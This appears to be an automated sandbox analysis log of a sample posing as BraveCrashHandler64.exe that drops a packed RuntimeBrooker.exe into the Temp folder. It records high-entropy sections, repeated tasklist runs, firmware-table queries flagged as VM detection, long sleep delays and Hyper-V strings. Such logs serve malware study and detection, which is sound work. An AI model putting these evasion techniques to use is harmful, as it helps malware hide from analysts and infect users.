Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Unpacked PE file: 32.2.RuntimeBrooker.exe.4f0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;Unknown_Section6:EW;Unknown_Section7:EW;Unknown_Section8:EW;Unknown_Section9:EW;Unknown_Section10:EW;Unknown_Section11:EW;Unknown_Section12:EW;Unknown_Section13:EW;.rsrc:EW;Unknown_Section15:EW;Unknown_Section16:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;Unknown_Section5:R;Unknown_Section6:R;Unknown_Section7:R;Unknown_Section8:R;Unknown_Section9:R;Unknown_Section10:W;Unknown_Section11:R;Unknown_Section12:R;Unknown_Section13:R;.rsrc:EW;Unknown_Section15:EW;Unknown_Section16:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .data

Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:

Source: BraveCrashHandler64.exe	Static PE information: section name: entropy: 7.966731476719586
Source: BraveCrashHandler64.exe	Static PE information: section name: entropy: 7.259672355449528
Source: BraveCrashHandler64.exe	Static PE information: section name: entropy: 7.701925098808373
Source: BraveCrashHandler64.exe	Static PE information: section name: .data entropy: 7.971716917592086
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name: entropy: 7.998942135594241
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name: entropy: 7.999613497251071
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name: entropy: 7.9979503311609506
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name: entropy: 7.437622686334161
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name: entropy: 7.999837709460686
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name: entropy: 7.999732846830117
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name: entropy: 7.9990578242908725
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name: entropy: 7.995003929911863

Source: C:\Users\user\Desktop\BraveCrashHandler64.exe

File created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	System information queried: FirmwareTableInformation

Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Window / User API: threadDelayed 1123	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Window / User API: threadDelayed 5025	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Window / User API: threadDelayed 3586	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Window / User API: threadDelayed 1217	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Window / User API: threadDelayed 440	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Window / User API: threadDelayed 431
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Window / User API: threadDelayed 1089
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Window / User API: threadDelayed 378

Source: C:\Users\user\Desktop\BraveCrashHandler64.exe TID: 6064	Thread sleep count: 1123 > 30	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe TID: 6172	Thread sleep count: 5025 > 30	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe TID: 6172	Thread sleep time: -5025000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe TID: 5104	Thread sleep count: 225 > 30	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe TID: 5104	Thread sleep time: -225000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe TID: 6172	Thread sleep count: 3586 > 30	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe TID: 6172	Thread sleep time: -3586000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe TID: 2120	Thread sleep count: 91 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe TID: 6220	Thread sleep count: 1217 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe TID: 6660	Thread sleep count: 167 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe TID: 6212	Thread sleep count: 440 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe TID: 3824	Thread sleep count: 306 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe TID: 4656	Thread sleep count: 169 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe TID: 1428	Thread sleep count: 431 > 30
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe TID: 6056	Thread sleep count: 1089 > 30
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe TID: 4484	Thread sleep count: 378 > 30
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe TID: 4484	Thread sleep count: 138 > 30
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe TID: 2500	Thread sleep count: 155 > 30
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe TID: 2500	Thread sleep count: 40 > 30
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe TID: 2384	Thread sleep count: 137 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: vmware
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
